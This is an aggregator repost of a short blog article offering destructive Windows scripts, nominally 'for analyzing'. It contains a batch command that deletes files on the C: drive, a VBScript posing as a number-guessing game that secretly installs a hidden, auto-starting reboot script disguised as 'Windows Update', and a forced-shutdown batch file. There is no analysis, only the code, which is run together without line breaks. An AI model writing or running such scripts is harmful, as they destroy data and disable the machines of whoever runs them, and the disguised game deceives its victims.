Your Web News in One Place

Help Webnuz

Referal links:

Sign up for GreenGeeks web hosting
April 16, 2022 04:25 am GMT

Malware Virus Scripts For Windows And Apk For Android (For Analyzing)

malware-viruses

cdrive.bat

Deletes the Cdrive of your computer or laptop

Code:

@Echo offDel C: *.* |y

Infinite rebooting

Running this script will cause the computer to reboot forever provided that:

The computer has a constant source of power
The user does not do a cold shutdown
The user does not boot into safe mode
The account that is logged into is the account that launched the above script

Code:

Option ExplicitOn Error Resume NextSet oFileSystem = CreateObject("Scripting.FileSystemObject")Set WshShell = CreateObject("WScript.Shell")' Install the reboot scriptapp_data = WshShell.ExpandEnvironmentStrings("%APPDATA%")full_install = app_data & "\winupdate.bat"If Not oFileSystem.FileExists(full_install) Then    Set reboot_script = oFileSystem.CreateTextFile(full_install)    reboot_script.WriteLine("shutdown -r -t 00")    reboot_script.Close()    WshShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update", full_install, "REG_SZ"    Set rs_map = oFileSystem.GetFile(full_install)    rs_map.Attributes = 2End IfSub NumbersGame    done = False    total_guesses = 0    Randomize    target = FormatNumber(Int((100 * Rnd) + 1))    Do Until done        input = InputBox("Type your guess:", "Pick a number between 1 and 100")        total_guesses = total_guesses + 1           If Len(input) <> 0 Then            If IsNumeric(input) Then                If FormatNumber(input) = target Then                    MsgBox("Yes, the random number is " & input & " and it took you " & total_guesses & " guesses to get there!")                    done = True                End If                If FormatNumber(input) < target Then                    MsgBox("Your guess is too small")                End If                If FormatNumber(input) > target Then                    MsgBox("You guess is too large")                End If            Else                MsgBox("Please enter in a number.")            End If        Else            MsgBox("Please play again soon!")            done = True        End If    LoopEnd SubCall NumbersGame

reboot.bat

After 1 Click It will Start to reboot the windows

Code:

@echo offshutdown -c ERROR!! -s 

Original Link: https://dev.to/mohammadtaseenkhan/malware-virus-scripts-for-windows-and-apk-for-android-for-analyzing-1blk

Share this article:    Share on Facebook
View Full Article

Dev To

An online community for sharing and discovering great ideas, having debates, and making friends

More About this Source Visit Dev To